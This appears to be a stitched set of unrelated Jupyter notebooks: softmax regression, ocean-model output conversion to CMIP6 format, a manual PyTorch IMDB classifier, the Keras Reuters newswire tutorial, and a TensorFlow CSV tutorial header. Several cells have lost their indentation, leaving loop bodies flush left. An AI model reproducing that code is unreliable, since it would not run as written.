            self.bias = self.bias - learning_rate * db
            if i % 100 == 0:
                print(f'Iteration number: {i}, loss: {np.round(loss, 4)}')
        return self.weights, self.bias, all_losses

    def predict(self, X):
        """
        Predict class labels for samples in X.
        Args:
            X: numpy array of shape (n_samples, n_features)
        Returns:
            numpy array of shape (n_samples, 1) with predicted classes
        """
        scores = self.compute_scores(X)
        probs = self.softmax(scores)
        return np.argmax(probs, axis=1)[:, np.newaxis]

    def softmax(self, scores):
        """
        Transforms a matrix of scores into row-wise probabilities.
        Args:
            scores: numpy array of shape (n_samples, n_classes)
                    with unnormalized scores
        Returns:
            numpy array of shape (n_samples, n_classes) with probabilities
        """
        # Subtract the row-wise max before exponentiating: mathematically a
        # no-op, but prevents overflow (NaN/inf) for large score magnitudes.
        shifted = scores - np.max(scores, axis=1, keepdims=True)
        exp = np.exp(shifted)
        return exp / np.sum(exp, axis=1, keepdims=True)

    def compute_scores(self, X):
        """
        Computes class scores (logits) for samples in X.
        Args:
            X: numpy array of shape (n_samples, n_features)
        Returns:
            scores: numpy array of shape (n_samples, n_classes)
        """
        return np.dot(X, self.weights.T) + self.bias

    def cross_entropy(self, y_true, probs):
        """Mean cross-entropy between one-hot targets and predicted probabilities."""
        loss = - (1 / self.n_samples) * np.sum(y_true * np.log(probs))
        return loss

    def one_hot(self, y):
        """
        Transforms a vector y of integer labels into a one-hot encoded matrix
        of shape (n_samples, n_classes).
        """
        one_hot = np.zeros((self.n_samples, self.n_classes))
        one_hot[np.arange(self.n_samples), y.T] = 1
        return one_hot
```
## Initializing and training the model
```
# Train for 800 full-batch iterations on the blob data, then plot the loss curve.
regressor = SoftmaxRegressor()
w_trained, b_trained, loss = regressor.train(X_train, y_train, learning_rate=0.1, n_iters=800, n_classes=4)
fig = plt.figure(figsize=(8,6))
plt.plot(np.arange(800), loss)
plt.title("Development of loss during training")
plt.xlabel("Number of iterations")
plt.ylabel("Loss")
plt.show()
```
## Testing the model
```
# Held-out accuracy: fraction of test samples whose predicted label matches.
n_test_samples, _ = X_test.shape
y_predict = regressor.predict(X_test)
print(f"Classification accuracy on test set: {(np.sum(y_predict == y_test)/n_test_samples) * 100}%")
```
| github_jupyter |
```
import glob
import os
# Absolute paths to the conda interpreter and processing scripts on the
# NCI (Gadi) filesystem; used to assemble shell commands below.
python = '/g/data/e14/dbi599/miniconda3/envs/cmip/bin/python'
mom_script = '/home/599/dbi599/ocean-analysis/data_processing/mom_to_cmip.py'
arith_script = '/home/599/dbi599/ocean-analysis/data_processing/calc_arithmetic.py'
# Control files, ocean 3D variables
# Each tuple is (MOM variable name, CMIP variable name, CF standard name).
variables = [('temp', 'bigthetao', 'sea_water_conservative_temperature'),
('salt', 'so', 'sea_water_salinity')]
for mom_name, var_name, standard_name in variables:
# Pair CMIP reference files with the MOM output chunks one-to-one, sorted by date.
cmip_files = glob.glob(f'/g/data/fs38/publications/CMIP6/FAFMIP/CSIRO-ARCCSS/ACCESS-CM2/faf-passiveheat/r1i1p1f1/Omon/{var_name}/gn/v20191210/*.nc')
cmip_files.sort()
mom_files = glob.glob(f'/g/data3/hh5/tmp/as7904/access-om2/Kewei_fafmip_output/071-077-rstflux-no-frazil/output07*/ocean/ocean_3d.nc')
mom_files.sort()
for cmip_file, mom_file in zip(cmip_files, mom_files):
# Reuse the reference file's date range in the output filename.
date_range = cmip_file.split('.')[0].split('_')[-1]
outdir = f'/g/data/r87/dbi599/CMIP6/FAFMIP/KEWEI-LYU/ACCESS-OM2/faf-passiveheat/r1i1p1f1/Omon/{var_name}/gn/v20191210/'
outfile = f'{var_name}_Omon_ACCESS-OM2_faf-passiveheat_r1i1p1f1_gn_{date_range}.nc'
#os.system(f'mkdir -p {outdir}')
cmd = f'{python} {mom_script} {mom_file} {mom_name} {cmip_file} {standard_name} {outdir}{outfile} --ref_names --ref_time'
# NOTE: execution is commented out — this cell is currently a dry run.
#print(cmd)
#os.system(cmd)
# experiment files, ocean 3D variables
# (mom_name, cmip_name, CF standard name); swap in the redist_heat tuple to
# process redistributed rather than added heat.
variables = [('added_heat', 'pabigthetao', 'sea_water_added_conservative_temperature')]
#variables = [('redist_heat', 'prbigthetao', 'sea_water_redistributed_conservative_temperature')]
experiment = 'water'
for mom_name, var_name, standard_name in variables:
cmip_files = glob.glob(f'/g/data/fs38/publications/CMIP6/FAFMIP/CSIRO-ARCCSS/ACCESS-CM2/faf-{experiment}/r1i1p1f1/Emon/{var_name}/gn/v20191210/*.nc')
cmip_files.sort()
mom_files = glob.glob(f'/g/data3/hh5/tmp/as7904/access-om2/Kewei_fafmip_output/071-077-rstflux-no-frazil-density-faf{experiment}/output07*/ocean/ocean_3d.nc')
mom_files.sort()
# Convert each MOM chunk using the matching CMIP file as the metadata reference.
for cmip_file, mom_file in zip(cmip_files, mom_files):
date_range = cmip_file.split('.')[0].split('_')[-1]
outdir = f'/g/data/r87/dbi599/CMIP6/FAFMIP/KEWEI-LYU/ACCESS-OM2/faf-{experiment}/r1i1p1f1/Emon/{var_name}/gn/v20191210/'
outfile = f'{var_name}_Emon_ACCESS-OM2_faf-{experiment}_r1i1p1f1_gn_{date_range}.nc'
os.system(f'mkdir -p {outdir}')
cmd = f'{python} {mom_script} {mom_file} {mom_name} {cmip_file} {standard_name} {outdir}{outfile} --ref_names --ref_time'
print(cmd)
os.system(cmd)
# experiment files, ocean surface variables
# Heat-flux variant kept commented for reference; the active run processes
# water-flux variables against the CMIP `wfo` reference.
#variables = ['sfc_hflux_coupler', 'sfc_hflux_from_runoff', 'sfc_hflux_pme', 'net_sfc_heating', 'sfc_hflux_correct']
# 'sfc_hflux_restore'
#ref_var = 'hfds'
#ref_name = 'surface_downward_heat_flux_in_sea_water'
variables = ['pme_net', 'pme_sbc', 'pme_correct', 'runoff']
#variables = ['pme_net', 'runoff']
ref_var = 'wfo'
ref_name = 'water_flux_into_sea_water'
version = 'v20200512'
experiment = 'all'
# heat water passiveheat
for var in variables:
cmip_files = glob.glob(f'/g/data/fs38/publications/CMIP6/FAFMIP/CSIRO-ARCCSS/ACCESS-CM2/faf-{experiment}/r1i1p1f1/Omon/{ref_var}/gn/{version}/*.nc')
cmip_files.sort()
# Exactly one reference file is expected for the surface variables.
assert len(cmip_files) == 1
cmip_file = cmip_files[0]
# The heat/water runs live in a '-density-faf<exp>' suffixed directory.
mom_dir = f'-density-faf{experiment}' if experiment in ['heat', 'water'] else ''
mom_files = glob.glob(f'/g/data3/hh5/tmp/as7904/access-om2/Kewei_fafmip_output/071-077-rstflux-no-frazil{mom_dir}/output07*/ocean/ocean_fluxes.nc')
mom_files.sort()
# CMIP filenames use hyphens rather than underscores.
mom_file_var = var.replace('_', '-')
date_range = cmip_file.split('.')[0].split('_')[-1]
outdir = f'/g/data/e14/dbi599/CMIP6/FAFMIP/KEWEI-LYU/ACCESS-OM2/faf-{experiment}/r1i1p1f1/Omon/{mom_file_var}/gn/{version}/'
outfile = f'{mom_file_var}_Omon_ACCESS-OM2_faf-{experiment}_r1i1p1f1_gn_{date_range}.nc'
os.system(f'mkdir -p {outdir}')
# All MOM chunks are passed to a single conversion command here.
cmd = f"{python} {mom_script} {' '.join(str(x) for x in mom_files)} {var} {cmip_file} {ref_name} {outdir}{outfile} --ref_time"
print(cmd)
os.system(cmd)
# Kewei FAFMIP temperature tendency data (includes frazil ice influence)
experiment = 'passiveheat'
cmip_files = glob.glob(f'/g/data/fs38/publications/CMIP6/FAFMIP/CSIRO-ARCCSS/ACCESS-CM2/faf-{experiment}/r1i1p1f1/Emon/ocontemptend/gn/v20191210/*.nc')
cmip_files.sort()
# The heat/water runs live in a '-density-faf<exp>' suffixed directory.
mom_dir = f'-density-faf{experiment}' if experiment in ['heat', 'water'] else ''
mom_files = glob.glob(f'/g/data3/hh5/tmp/as7904/access-om2/Kewei_fafmip_output/071-077-rstflux-no-frazil{mom_dir}/output07*/ocean/temp_increment_tend.nc')
mom_files.sort()
outdir = f'/g/data/r87/dbi599/CMIP6/FAFMIP/KEWEI-LYU/ACCESS-OM2/faf-{experiment}/r1i1p1f1/Emon/temp-increment-tend/gn/v20191210/'
os.system(f'mkdir -p {outdir}')
# One conversion command per (CMIP reference, MOM chunk) pair.
for cmip_file, mom_file in zip(cmip_files, mom_files):
date_range = cmip_file.split('.')[0].split('_')[-1]
outfile = f'temp-increment-tend_Emon_ACCESS-OM2_faf-{experiment}_r1i1p1f1_gn_{date_range}.nc'
cmd = f"{python} {mom_script} {mom_file} temp_increment_tend {cmip_file} tendency_of_sea_water_conservative_temperature_expressed_as_heat_content {outdir}{outfile} --ref_time"
print(cmd)
os.system(cmd)
# Reconstruct full temperature fields: control bigthetao + passive added/
# redistributed component, chunk by chunk via calc_arithmetic.py.
exp = 'water'
var = 'abigthetao'
heat_type = 'added'
control_files = glob.glob('/g/data/r87/dbi599/CMIP6/FAFMIP/KEWEI-LYU/ACCESS-OM2/faf-passiveheat/r1i1p1f1/Omon/bigthetao/gn/v20191210/bigthetao_Omon_ACCESS-OM2_faf-passiveheat_r1i1p1f1_gn_*.nc')
exp_files = glob.glob(f'/g/data/r87/dbi599/CMIP6/FAFMIP/KEWEI-LYU/ACCESS-OM2/faf-{exp}/r1i1p1f1/Emon/p{var}/gn/v20191210/p{var}_Emon_ACCESS-OM2_faf-{exp}_r1i1p1f1_gn_*.nc')
control_files.sort()
exp_files.sort()
for control_file, exp_file in zip(control_files, exp_files):
date_range = control_file.split('.')[0].split('_')[-1]
outdir = f'/g/data/r87/dbi599/CMIP6/FAFMIP/KEWEI-LYU/ACCESS-OM2/faf-{exp}/r1i1p1f1/Emon/{var}/gn/v20191210/'
outfile = f'{var}_Emon_ACCESS-OM2_faf-{exp}_r1i1p1f1_gn_{date_range}.nc'
#os.system(f'mkdir -p {outdir}')
cmd = f'{python} {arith_script} {control_file} sea_water_conservative_temperature {exp_file} sea_water_{heat_type}_conservative_temperature addition {outdir}{outfile}'
# NOTE: execution is commented out — this cell currently only prints commands.
print(cmd)
#os.system(cmd)
exp_files
```
| github_jupyter |
<a href="https://colab.research.google.com/github/xSakix/AI_colab_notebooks/blob/master/imdb_2.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# IMDB DNN
Lets do the IMDB dataset with a simple DNN. The first one is in numpy and second will be done in pytorch, but only using tensor for the GPU. Not using backwards or any NN functionality, as the goal is to implement it and learn how it works behind the scenes.
```
import keras
import numpy as np
import torch
import matplotlib.pyplot as plt
# Fix RNG seeds for reproducibility across torch and numpy.
torch.manual_seed(2019)
np.random.seed(42)
# Machine epsilon for float32; used to keep sigmoid outputs strictly inside
# (0, 1) so the later log() calls never see exactly 0.
EPS = torch.finfo(torch.float32).eps
def convert_to_array(x, pad_len=None):
    """Pad/truncate each sequence in *x* to a fixed length and stack into an array.

    Fixes the original implementation, which iterated over the global x_train
    regardless of its argument (so converting x_val silently returned converted
    x_train data) and mutated the caller's lists in place.

    Args:
        x: iterable of integer sequences (lists).
        pad_len: target length; defaults to the module-level `maxlen`.

    Returns:
        numpy array of shape (len(x), pad_len), zero-padded on the right.
    """
    if pad_len is None:
        pad_len = maxlen
    padded = []
    for seq in x:
        row = list(seq[:pad_len])  # copy: never mutate the caller's lists
        row.extend([0.0] * (pad_len - len(row)))
        padded.append(row)
    return np.array(padded)
def relu(z):
    """Element-wise ReLU: max(0, z).

    zeros_like keeps the zeros tensor on z's own device, so this works on
    CPU as well as GPU (the original hard-coded .cuda()).
    """
    return torch.maximum(torch.zeros_like(z), z)
def back_relu(Z, dA):
    """Backward pass of ReLU: pass dA through where Z > 0, zero elsewhere.

    Equivalent to dA * (Z > 0), implemented by cloning dA and zeroing the
    entries where the forward input was non-positive. Device-agnostic
    (the original forced .cuda()).
    """
    dZ = dA.detach().clone()
    dZ[Z <= 0.] = 0.
    return dZ
def sigmoid(z):
    """Element-wise logistic sigmoid, device-agnostic.

    The module-level EPS term in the denominator keeps the output strictly
    below 1, so the later log(1 - A) never sees exactly 0. (The original
    hard-coded .cuda(), breaking CPU execution.)
    """
    return 1. / (1. + torch.exp(-z) + EPS)
def back_sigmoid(Z, dA):
    """Backward pass of the sigmoid: dA * s * (1 - s), with s = sigmoid(Z).

    Recomputes the same EPS-regularised sigmoid as the forward pass so the
    gradient matches it exactly. Device-agnostic (original forced .cuda()).
    """
    s = 1 / (1 + torch.exp(-Z) + EPS)
    dZ = dA * s * (1 - s)
    return dZ
# Quick sanity checks of the activation helpers (requires a CUDA device).
x=torch.randn(1,5).cuda()
dx=torch.randn(1,5).cuda()
print(x)
print(relu(x))
print("*"*80)
print(x)
print(dx)
#where x <= 0 dx will 0
print(back_relu(x,dx))
print("*"*80)
print(sigmoid(x))
print(back_sigmoid(x,dx))
# Load IMDB, pad/truncate reviews to a fixed length, and lay the data out
# column-wise (features x samples) for the hand-rolled network below.
max_features = 20000 # Only consider the top 20k words
maxlen = 200 # Only consider the first 200 words of each movie review
(x_train, y_train), (x_val, y_val) = keras.datasets.imdb.load_data(num_words=max_features)
# NOTE(review): ensure convert_to_array operates on its argument, not the
# global x_train, or the validation set is silently wrong.
x_train = convert_to_array(x_train)
x_val = convert_to_array(x_val)
# Transpose everything to (features, samples) / (1, samples) layout.
y_train = y_train.reshape(y_train.shape[0], -1).T
y_val = y_val.reshape(y_val.shape[0], -1).T
x_train = x_train.reshape(x_train.shape[0], -1).T
x_val = x_val.reshape(x_val.shape[0], -1).T
print("*" * 80)
print("x_train:{}".format(x_train.shape))
print("x_val:{}".format(x_val.shape))
print("y_train:{}".format(y_train.shape))
print("y_val:{}".format(y_val.shape))
print("*" * 80)
assert (x_train.shape == (maxlen, 25000))
assert (y_train.shape == (1, 25000))
assert (x_val.shape == (maxlen, 25000))
assert (y_val.shape == (1, 25000))
print("*" * 80)
print("max x_train before:{}".format(np.max(x_train)))
print("max x_val before:{}".format(np.max(x_val)))
print("min before:{}, {}".format(np.min(x_train), np.min(x_val)))
# norm didn't work well
# norm = np.linalg.norm(x_train, ord=2)
# print("norm={}".format(norm))
# normalizing around max_features works well
# x_train = x_train / max_features
# x_val = x_val / max_features
# centering around mean
# Standardise with the *training* mean/std (also applied to the validation set).
x_mean = np.mean(x_train)
x_std = np.std(x_train)
print("(mean,std)=({},{})".format(x_mean, x_std))
x_train = (x_train - x_mean) / x_std
x_val = (x_val - x_mean) / x_std
print("max x_train after norm:{}".format(np.max(x_train)))
print("max x_val after norm:{}".format(np.max(x_val)))
print("min after norm:{}, {}".format(np.min(x_train), np.min(x_val)))
# assert ((x_train >= 0.).all() and (x_train < 1.).all())
print("*" * 80)
print("y_train unique vals:{}".format(np.unique(y_train)))
# Fixed: this line previously printed np.unique(y_train) for the val labels.
print("y_val unique vals:{}".format(np.unique(y_val)))
print("*" * 80)
# 2 layer network
# m = number of samples, n_x = input features, n_h = hidden units, n_y = outputs.
m = x_train.shape[1]
n_x = x_train.shape[0]
n_h = 128
n_y = 1
# init params
# Small random weights (scaled by 0.01) and zero biases, all on the GPU.
W1 = torch.randn(n_h, n_x).cuda() * 0.01
b1 = torch.zeros((n_h, 1)).cuda()
W2 = torch.randn(n_y, n_h).cuda() * 0.01
b2 = torch.zeros((n_y, 1)).cuda()
assert (W1.size() == (n_h, n_x))
assert (b1.size() == (n_h, 1))
assert (W2.size() == (n_y, n_h))
assert (b2.size() == (n_y, 1))
costs = []
n_iter = 100000
learning_rate = 0.01
# Move the training data to the GPU as float32 tensors.
x_train = torch.tensor(x_train,dtype=torch.float32).cuda()
y_train = torch.tensor(y_train,dtype=torch.float32).cuda()
# Full-batch gradient descent: relu hidden layer, sigmoid output,
# binary cross-entropy loss, manual backprop.
for i in range(0, n_iter):
# forward
# A1, cache1 = linear_activation_forward(X, W1, b1, "relu")
# do a forward pass over relu
# print("W1.shape:{}".format(W1.shape))
# print("X.shape:{}".format(x_train.shape))
# m x n * n x p = m x p
# (5, 200) * (200, 25000)
Z1 = torch.mm(W1, x_train).cuda() + b1
assert (Z1.size() == (n_h, m))
A1 = relu(Z1)
assert (A1.size() == (n_h, m))
# A2, cache2 = linear_activation_forward(A1, W2, b2, "sigmoid")
Z2 = torch.mm(W2, A1).cuda() + b2
assert (Z2.size() == (n_y, m))
A2 = sigmoid(Z2)
assert (A2.size() == (n_y, m))
# compute cost
# Binary cross-entropy averaged over the batch.
cost = -(1 / m) * torch.sum(y_train * torch.log(A2).cuda() + (1 - y_train) * torch.log(1 - A2).cuda()).cuda()
cost = torch.squeeze(cost)
# backward compute loss
# dL/dA2 for binary cross-entropy.
dA2 = -(torch.divide(y_train, A2).cuda() - torch.divide(1 - y_train, 1 - A2).cuda())
# print("dA2.shape={}".format(dA2.shape))
assert (dA2.size() == A2.size())
# backward
dZ2 = back_sigmoid(Z2, dA2)
assert (dZ2.size() == dA2.size())
dW2 = (1 / m) * torch.mm(dZ2, A1.T).cuda()
db2 = (1 / m) * torch.sum(dZ2, dim=1, keepdims=True).cuda()
dA1 = torch.mm(W2.T, dZ2).cuda()
assert (dA1.size() == A1.size())
assert (dW2.size() == W2.size())
assert (db2.size() == b2.size())
dZ1 = back_relu(Z1, dA1)
assert (dZ1.size() == dA1.size())
dW1 = (1 / m) * torch.mm(dZ1, x_train.T).cuda()
db1 = (1 / m) * torch.sum(dZ1, dim=1, keepdims=True).cuda()
assert (dW1.size() == W1.size())
assert (db1.size() == b1.size())
# update params
# Vanilla gradient-descent step.
W2 = W2 - learning_rate * dW2
b2 = b2 - learning_rate * db2
W1 = W1 - learning_rate * dW1
b1 = b1 - learning_rate * db1
# print stats
if i % 1000 == 0:
print("Cost after iteration {}: {}".format(i, cost))
if i % 1000 == 0:
costs.append(cost)
#predict
# Forward pass over the training set, thresholding at 0.5.
p = torch.zeros((1, x_train.shape[1])).cuda()
Z1 = torch.mm(W1, x_train).cuda() + b1
A1 = relu(Z1)
Z2 = torch.mm(W2, A1).cuda() + b2
A2 = sigmoid(Z2)
# convert probas to 0/1 predictions
for i in range(0, A2.shape[1]):
if A2[0, i] > 0.5:
p[0, i] = 1
else:
p[0, i] = 0
# Accuracy = mean agreement between thresholded predictions and labels.
print("Accuracy on training set: " + str(torch.sum((p == y_train)/x_train.shape[1]).cuda()))
# Same forward pass + thresholding on the validation set, then the loss curve.
x_val = torch.tensor(x_val,dtype=torch.float32).cuda()
y_val = torch.tensor(y_val,dtype=torch.float32).cuda()
#predict
p = torch.zeros((1, x_val.shape[1])).cuda()
Z1 = torch.mm(W1, x_val).cuda() + b1
A1 = relu(Z1)
Z2 = torch.mm(W2, A1).cuda() + b2
A2 = sigmoid(Z2)
# convert probas to 0/1 predictions
for i in range(0, A2.shape[1]):
if A2[0, i] > 0.5:
p[0, i] = 1
else:
p[0, i] = 0
print("Accuracy on validation/test set: " + str(torch.sum((p == y_val)/x_val.shape[1]).cuda()))
# NOTE(review): `costs` holds CUDA tensors; matplotlib may need them moved to
# the CPU first (e.g. [c.cpu() for c in costs]) — confirm on this torch version.
plt.plot(costs)
plt.ylabel('cost')
plt.xlabel('iterations (per hundreds)')
plt.title("Learning rate =" + str(learning_rate))
plt.show()
```
# summary
So even with enough compute (GPU) and a fairly low loss/cost, we don't actually get better accuracy on the validation set.
That looks like **overfitting**.
| github_jupyter |
```
import keras
keras.__version__
```
# Classifying newswires: a multi-class classification example
This notebook contains the code samples found in Chapter 3, Section 5 of [Deep Learning with Python](https://www.manning.com/books/deep-learning-with-python?a_aid=keras&a_bid=76564dff). Note that the original text features far more content, in particular further explanations and figures: in this notebook, you will only find source code and related comments.
----
In the previous section we saw how to classify vector inputs into two mutually exclusive classes using a densely-connected neural network.
But what happens when you have more than two classes?
In this section, we will build a network to classify Reuters newswires into 46 different mutually-exclusive topics. Since we have many
classes, this problem is an instance of "multi-class classification", and since each data point should be classified into only one
category, the problem is more specifically an instance of "single-label, multi-class classification". If each data point could have
belonged to multiple categories (in our case, topics) then we would be facing a "multi-label, multi-class classification" problem.
## The Reuters dataset
We will be working with the _Reuters dataset_, a set of short newswires and their topics, published by Reuters in 1986. It's a very simple,
widely used toy dataset for text classification. There are 46 different topics; some topics are more represented than others, but each
topic has at least 10 examples in the training set.
Like IMDB and MNIST, the Reuters dataset comes packaged as part of Keras. Let's take a look right away:
```
from keras.datasets import reuters
(train_data, train_labels), (test_data, test_labels) = reuters.load_data(num_words=10000)
```
Like with the IMDB dataset, the argument `num_words=10000` restricts the data to the 10,000 most frequently occurring words found in the
data.
We have 8,982 training examples and 2,246 test examples:
```
len(train_data)
len(test_data)
```
As with the IMDB reviews, each example is a list of integers (word indices):
```
train_data[10]
```
Here's how you can decode it back to words, in case you are curious:
```
word_index = reuters.get_word_index()
reverse_word_index = dict([(value, key) for (key, value) in word_index.items()])
# Note that our indices were offset by 3
# because 0, 1 and 2 are reserved indices for "padding", "start of sequence", and "unknown".
decoded_newswire = ' '.join([reverse_word_index.get(i - 3, '?') for i in train_data[0]])
decoded_newswire
```
The label associated with an example is an integer between 0 and 45: a topic index.
```
train_labels[10]
```
## Preparing the data
We can vectorize the data with the exact same code as in our previous example:
```
import numpy as np
def vectorize_sequences(sequences, dimension=10000):
    """Multi-hot encode integer sequences into a (len(sequences), dimension) float matrix."""
    encoded = np.zeros((len(sequences), dimension))
    for row, word_indices in enumerate(sequences):
        encoded[row, word_indices] = 1.
    return encoded
# Our vectorized training data
x_train = vectorize_sequences(train_data)
# Our vectorized test data
x_test = vectorize_sequences(test_data)
```
To vectorize the labels, there are two possibilities: we could just cast the label list as an integer tensor, or we could use a "one-hot"
encoding. One-hot encoding is a widely used format for categorical data, also called "categorical encoding".
For a more detailed explanation of one-hot encoding, you can refer to Chapter 6, Section 1.
In our case, one-hot encoding of our labels consists in embedding each label as an all-zero vector with a 1 in the place of the label index, e.g.:
```
def to_one_hot(labels, dimension=46):
    """One-hot encode integer labels into a (len(labels), dimension) float matrix."""
    encoded = np.zeros((len(labels), dimension))
    for row, label in enumerate(labels):
        encoded[row, label] = 1.
    return encoded
# Our vectorized training labels
one_hot_train_labels = to_one_hot(train_labels)
# Our vectorized test labels
one_hot_test_labels = to_one_hot(test_labels)
```
Note that there is a built-in way to do this in Keras, which you have already seen in action in our MNIST example:
```
from keras.utils.np_utils import to_categorical
one_hot_train_labels = to_categorical(train_labels)
one_hot_test_labels = to_categorical(test_labels)
```
## Building our network
这个主题分类问题看起来非常类似于我们以前的电影评论分类问题:在这两种情况下,我们正在尝试分类短片段的文本。然而,这里有一个新的约束:输出类的数量从2增加到46,即输出空间的维数要大得多。
在我们所使用的密集层堆栈中,每个层只能访问前一层输出中存在的信息。如果一层删除了与分类问题相关的信息,那么这些信息就永远不能被后面的层所恢复:每一层都有可能成为“信息瓶颈”。在我们前面的例子中,我们使用了16个维度的中间层,但是16维空间可能太有限,无法学会分离46个不同的类:这样的小层可以充当信息瓶颈,永久地丢弃相关信息。
由于这个原因,我们将使用具有更多单元的层。这里使用用64个单元:
```
from keras import models
from keras import layers
# Two 64-unit relu layers (wide enough to avoid a 46-class information
# bottleneck), then a 46-way softmax output.
model = models.Sequential()
model.add(layers.Dense(64, activation='relu', input_shape=(10000,)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(46, activation='softmax'))
```
There are two other things you should note about this architecture:
* We are ending the network with a `Dense` layer of size 46. This means that for each input sample, our network will output a
46-dimensional vector. Each entry in this vector (each dimension) will encode a different output class.
* The last layer uses a `softmax` activation. You have already seen this pattern in the MNIST example. It means that the network will
output a _probability distribution_ over the 46 different output classes, i.e. for every input sample, the network will produce a
46-dimensional output vector where `output[i]` is the probability that the sample belongs to class `i`. The 46 scores will sum to 1.
The best loss function to use in this case is `categorical_crossentropy`. It measures the distance between two probability distributions:
in our case, between the probability distribution output by our network, and the true distribution of the labels. By minimizing the
distance between these two distributions, we train our network to output something as close as possible to the true labels.
```
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'])
```
## Validating our approach
Let's set apart 1,000 samples in our training data to use as a validation set:
```
x_val = x_train[:1000]
partial_x_train = x_train[1000:]
y_val = one_hot_train_labels[:1000]
partial_y_train = one_hot_train_labels[1000:]
```
Now let's train our network for 20 epochs:
```
history = model.fit(partial_x_train,
partial_y_train,
epochs=20,
batch_size=512,
validation_data=(x_val, y_val))
```
Let's display its loss and accuracy curves:
```
import matplotlib.pyplot as plt
loss = history.history['loss']
val_loss = history.history['val_loss']
epochs = range(1, len(loss) + 1)
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label='Validation loss')
plt.title('Training and validation loss')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.show()
plt.clf() # clear figure
acc = history.history['acc']
val_acc = history.history['val_acc']
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label='Validation acc')
plt.title('Training and validation accuracy')
plt.xlabel('Epochs')
plt.ylabel('Loss')
plt.legend()
plt.show()
```
It seems that the network starts overfitting after 8 epochs. Let's train a new network from scratch for 8 epochs, then let's evaluate it on
the test set:
```
model = models.Sequential()
model.add(layers.Dense(64, activation='relu', input_shape=(10000,)))
model.add(layers.Dense(64, activation='relu'))
model.add(layers.Dense(46, activation='softmax'))
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'])
model.fit(partial_x_train,
partial_y_train,
epochs=8,
batch_size=512,
validation_data=(x_val, y_val))
results = model.evaluate(x_test, one_hot_test_labels)
results
```
Our approach reaches an accuracy of ~78%. With a balanced binary classification problem, the accuracy reached by a purely random classifier
would be 50%, but in our case it is closer to 19%, so our results seem pretty good, at least when compared to a random baseline:
下面展示了随机猜测所有样本的类时,猜测正确的概率。
```
import copy
test_labels_copy = copy.copy(test_labels)
np.random.shuffle(test_labels_copy)
float(np.sum(np.array(test_labels) == np.array(test_labels_copy))) / len(test_labels)
```
## Generating predictions on new data
We can verify that the `predict` method of our model instance returns a probability distribution over all 46 topics. Let's generate topic
predictions for all of the test data:
```
predictions = model.predict(x_test)
```
Each entry in `predictions` is a vector of length 46:
```
predictions[0].shape
```
The coefficients in this vector sum to 1:表示概率。
```
np.sum(predictions[0])
```
The largest entry is the predicted class, i.e. the class with the highest probability:
```
np.argmax(predictions[0])
```
## A different way to handle the labels and the loss
We mentioned earlier that another way to encode the labels would be to cast them as an integer tensor, like such:
```
y_train = np.array(train_labels)
y_test = np.array(test_labels)
```
The only thing it would change is the choice of the loss function. Our previous loss, `categorical_crossentropy`, expects the labels to
follow a categorical encoding. With integer labels, we should use `sparse_categorical_crossentropy`:
```
model.compile(optimizer='rmsprop', loss='sparse_categorical_crossentropy', metrics=['acc'])
```
This new loss function is still mathematically the same as `categorical_crossentropy`; it just has a different interface.
## On the importance of having sufficiently large intermediate layers
十分重要!!!
We mentioned earlier that since our final outputs were 46-dimensional, we should avoid intermediate layers with much less than 46 hidden
units. Now let's try to see what happens when we introduce an information bottleneck by having intermediate layers significantly less than
46-dimensional, e.g. 4-dimensional.
```
model = models.Sequential()
model.add(layers.Dense(64, activation='relu', input_shape=(10000,)))
model.add(layers.Dense(4, activation='relu'))
model.add(layers.Dense(46, activation='softmax'))
model.compile(optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'])
model.fit(partial_x_train,
partial_y_train,
epochs=20,
batch_size=128,
validation_data=(x_val, y_val))
```
Our network now seems to peak at ~71% test accuracy, an 8% absolute drop. This drop is mostly due to the fact that we are now trying to
compress a lot of information (enough information to recover the separation hyperplanes of 46 classes) into an intermediate space that is
too low-dimensional. The network is able to cram _most_ of the necessary information into these 4-dimensional representations, but not all
of it.
## Further experiments
* Try using larger or smaller layers: 32 units, 128 units...
* We were using two hidden layers. Now try to use a single hidden layer, or three hidden layers.
## Wrapping up
Here's what you should take away from this example:
* If you are trying to classify data points between N classes, your network should end with a `Dense` layer of size N.
* 在单标签多类分类问题中,您的网络应该以SOFTMax激活结束,以便它将在N个输出类上输出概率分布。
* _Categorical crossentropy_ 几乎总是你用来解决这些问题的损失函数。它最小化了由网络输出的概率分布与目标的真实分布之间的距离。
* There are two ways to handle labels in multi-class classification:
** Encoding the labels via "categorical encoding" (also known as "one-hot encoding") and using `categorical_crossentropy` as your loss
function.
** Encoding the labels as integers and using the `sparse_categorical_crossentropy` loss function.
* If you need to classify data into a large number of categories, then you should avoid creating information bottlenecks in your network by having
intermediate layers that are too small.
| github_jupyter |
##### Copyright 2019 The TensorFlow Authors.
```
#@title Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
```
# Load CSV data
<table class="tfo-notebook-buttons" align="left">
<td>
<a target="_blank" href="https://www.tensorflow.org/tutorials/load_data/csv"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />View on TensorFlow.org</a>
</td>
<td>
<a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs/blob/master/site/en/tutorials/load_data/csv.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
</td>
<td>
<a target="_blank" href="https://github.com/tensorflow/docs/blob/master/site/en/tutorials/load_data/csv.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View source on GitHub</a>
</td>
<td>
<a href="https://storage.googleapis.com/tensorflow_docs/docs/site/en/tutorials/load_data/csv.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Download notebook</a>
</td>
</table>
This tutorial provides examples of how to use CSV data with TensorFlow.
